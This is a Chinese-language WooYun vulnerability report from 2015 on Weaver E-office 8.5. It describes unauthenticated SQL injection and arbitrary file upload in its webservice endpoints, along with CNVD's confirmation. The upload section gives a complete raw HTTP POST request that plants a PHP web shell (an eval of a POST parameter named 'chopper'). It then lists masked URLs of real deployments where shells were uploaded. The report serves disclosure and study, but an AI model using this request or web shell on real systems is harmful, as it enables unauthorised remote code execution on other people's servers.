泛微E-office 3处sql注射(ROOT SHELL)/2处任意文件上传

漏洞概要

缺陷编号:WooYun-2015-0125282

漏洞标题:泛微E-office 3处sql注射(ROOT SHELL)/2处任意文件上传

相关厂商:泛微E-Office

漏洞作者:menmen519

提交时间:2015-07-10 10:31

公开时间:2015-10-08 11:52

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签:

漏洞详情

披露状态:

2015-07-10: 细节已通知厂商并且等待厂商处理中
2015-07-10: 厂商已经确认,细节仅向厂商公开
2015-07-13: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-09-03: 细节向核心白帽子及相关领域专家公开
2015-09-13: 细节向普通白帽子公开
2015-09-23: 细节向实习白帽子公开
2015-10-08: 细节向公众公开

简要描述:

泛微E-office3处sql注射(ROOT SHELL)/2处任意文件上传,不是为了刷漏洞,临睡前顺带又看了看其他目录,发现还有余孽,一并提交

详细说明:

看了wooyun个大牛发的这个产品的漏洞,感觉版本都过低,这里我发一个8.5的版本,里面新增了webservice的相关操作 下来看代码经过一阵子的翻阅,发现和webservice 并行的目录也存在越权行为,代码结构类似:

第一个目录webservice-json/login/login.wsdl.php:

代码结构,风格都一样,漏洞请参照http://**.**.**.**/bugs/wooyun-2015-0125281/trace/288315217e38c991a819ae7415cd1926webservice-json/upload/upload.php:

漏洞参照:http://**.**.**.**/bugs/wooyun-2015-0125265/trace/efd66a6faa58a6bf64582d7de9f26b1b同理:webservice-xml/login/login.wsdl.phpwebservice-xml/upload/upload.php内容一样 原理同上这里证明一下这些文件在最新的e-office 存在即可http://**.**.**.**/webservice-xml/login/login.wsdl.phphttp://**.**.**.**/webservice-xml/login/login.wsdl.phphttp://**.**.**.**/webservice-xml/login/login.wsdl.phphttp://**.**.**.**:8028/webservice-xml/login/login.wsdl.phphttp://**.**.**.**/webservice-xml/upload/upload.phphttp://**.**.**.**/webservice-xml/upload/upload.phphttp://**.**.**.**/webservice-xml/upload/upload.phphttp://**.**.**.**:8028/webservice-xml/upload/upload.phphttp://**.**.**.**/webservice-json/upload/upload.phphttp://**.**.**.**/webservice-json/upload/upload.phphttp://**.**.**.**/webservice-json/upload/upload.phphttp://**.**.**.**:8028/webservice-json/upload/upload.php看了wooyun个大牛发的这个产品的漏洞,感觉版本都过低,这里我发一个8.5的版本,里面新增了webservice的相关操作 下来看代码webservice/login/login.wsdl.php?wsdl:

http://**.**.**.**/webservice/login/login.wsdl.php?wsdl这个文件也没有进行任何auth验证:

我们访问:http://**.**.**.**/attachment/1.php原理都相同,不多赘述http://**.**.**.**//webservice/eoffice.wsdl.php?wsdlhttp://**.**.**.**/webservice/eoffice.wsdl.php?wsdlhttp://**.**.**.**/webservice/eoffice.wsdl.php?wsdlhttp://**.**.**.**:8028/webservice/eoffice.wsdl.php?wsdl任意文件上传:下来看代码:webservice/upload.php

文件上传条件:1.无需登录2.文件的路径为attachment/$attachmentID 这里的$attachmentID 会被回显过来3.无需后缀验证发送如下请求:POST /webservice/upload.php HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveContent-Type: multipart/form-data; boundary=---------------------------74141544123431Content-Length: 818-----------------------------74141544123431Content-Disposition: form-data; name="file"; filename="1.php"Content-Type: image/jpeg<?php phpinfo();@eval($_POST['chopper']);?>-----------------------------74141544123431--

shell

案例:http://**.**.**.**/http://**.**.**.**/attachment/2754969047/wooyun.phphttp://**.**.**.**/attachment/2070630318/wooyun.php**.**.**.**:8028/attachment/1002074664/wooyun.php其中最后一个官网设置了目录访问权限,所以不能访问那个文件但是文件已经上传上去了,这种情况,如果有特殊说明,必须告知用户,否则后果很严重第二处:webservice/upload/upload.php:

代码很相似,绕一下逻辑即可,原理就不用解释了

漏洞证明:

修复方案:

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-07-1011:50

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过软件生产厂商(或网站管理方)公开联系渠道向其邮件(和电话)通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无

评价

  1. 2010-01-01 00:00 君宝 白帽子 | Rank:15 漏洞数:2)

    来点赞哒!